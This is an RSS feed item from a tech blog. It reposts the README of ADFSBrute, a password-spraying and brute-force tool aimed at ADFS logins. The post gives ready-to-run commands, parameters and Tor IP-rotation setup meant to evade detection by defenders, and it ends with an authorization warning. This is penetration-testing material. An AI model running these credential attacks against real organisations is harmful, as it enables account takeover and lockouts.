<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>bruteforce Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/bruteforce/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/bruteforce/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Sun, 25 Apr 2021 23:09:48 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>bruteforce Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/bruteforce/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Offensive Security Tool: ADFSBrute</title>
		<link>http://kostacipo.stream/offensive-security-tool-adfsbrute/</link>
					<comments>http://kostacipo.stream/offensive-security-tool-adfsbrute/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 25 Apr 2021 23:05:03 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[bruteforce]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2084</guid>

					<description><![CDATA[<p>Offensive Security Tool: ADFSBrute GitHub Link adfsbrute ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks. The main idea is carrying out password spraying attacks with a random and high delay between each test and [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/offensive-security-tool-adfsbrute/">Offensive Security Tool: ADFSBrute</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Offensive Security Tool: ADFSBrute</strong></p>
<p><a href="https://github.com/blackhatethicalhacking/adfsbrute">GitHub Link</a></p>
<p><strong>adfsbrute</strong></p>
<p>ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks.</p>
<p>The main idea is carrying out password spraying attacks with a random and high delay between each test and using a list of proxies or <a href="https://github.com/ricardojoserf/adfsbrute#using-tor" data-et-has-event-already="true">Tor</a> to make the detection by the Blue Team more difficult. Brute force attacks are also possible, or testing credentials with the format <em>username:password</em> (for example from <a href="https://github.com/davidtavarez/pwndb">Pwndb</a>). Tested logins will get stored in a log file to avoid testing them twice.</p>
<p><strong>Usage</strong></p>
<pre><strong><code>./adfsbrute.py -t TARGET [-u USER] [-U USER_LIST] [-p PASSWORD] [-P PASSWORD_LIST] [-UL userpassword_list]
[-m MIN_TIME] [-M MAX_TIME] [-tp TOR_PASSWORD] [-pl PROXY_LIST] [-n NUMBER_OF_REQUESTS_PER_IP]
[-s STOP_ON_SUCCESS] [-r RANDOM_COMBINATIONS] [-d DEBUG] [-l LOG_FILE]</code></strong></pre>
<p>The parameters for the attacks are:</p>
<pre><strong><code>* -t: Target domain. Example: test.com

* -u: Single username. Example: agarcia@domain.com

* -U: File with a list of usernames. Example: users.txt

* -p: Single password: Example: Company123

* -P: File with a list of passwords. Example: passwords.txt

* -UP: File with a list of credentials in the format "username:password". Example: userpass.txt

* -m : Minimum value of random seconds to wait between each test. Default: 30

* -M : Maximum value of random seconds to wait between each test. Default: 60

* -tp: Tor password (change IP addresses using Tor)

* -pl: Use a proxy list (change IP addresses using a list of proxy IPs)

* -n: Number of requests before changing IP address (used with -tp or -pl). Default: 1

* -s: Stop on success, when one correct credential is found. Default: False

* -r: Randomize the combination of users and passwords. Default: True

* -d: Show debug messages. Default: True

* -l: Log file location with already tested credentials. Default: tested.txt</code></strong></pre>
<p><strong>Examples</strong></p>
<p>Password spraying with password “Company123”, tor password is “test123” and changing the IP every 3 requests:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -n 3</code></strong></pre>
<p><img fetchpriority="high" decoding="async" class="wp-image-252386 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1.png" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 826px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1.png 826w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image1-480x456.png 480w" alt="" width="826" height="785" /></p>
<p>Password spraying with password “Company123”, tor password is “test123”, changing the IP for every request, random delay time between 10 and 20 seconds and do not randomize the order of users:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -m 10 -M 20 -r False</code></strong></pre>
<p><img decoding="async" class="wp-image-252387 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2.png" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 826px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2.png 826w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image2-480x484.png 480w" alt="" width="826" height="833" /></p>
<p>Finding ADFS url:</p>
<pre><strong><code>python3 adfsbrute.py -t company.com</code></strong></pre>
<p><img decoding="async" class="wp-image-252388 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3.png" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 829px, 100vw" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3.png 829w, https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/image3-480x100.png 480w" alt="" width="829" height="173" /></p>
<p><strong>Using Tor</strong></p>
<p>To use Tor to change the IP for every request, you must hash a password:</p>
<pre><strong><code>tor --hash-password test123</code></strong></pre>
<p>In the file /etc/tor/torrc, uncomment the variable <em>ControlPort</em> and the variable <em>HashedControlPassword</em>, and in this last one add the hash:</p>
<pre><strong><code>ControlPort 9051
HashedControlPassword 16:7F314CAB402A81F860B3EE449B743AEC0DED9F27FA41831737E2F08F87</code></strong></pre>
<p>Restart the tor service and use this password as argument for the script (“-tp test123” or “–tor_password 123”)</p>
<pre><strong><code>service tor restart</code></strong></pre>
<p><strong>Note</strong></p>
<p>This script is implemented to test in security audits, DO NOT use without proper authorization from the company owning the ADFS or you will block accounts.</p>
<p>The post <a href="http://kostacipo.stream/offensive-security-tool-adfsbrute/">Offensive Security Tool: ADFSBrute</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/offensive-security-tool-adfsbrute/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
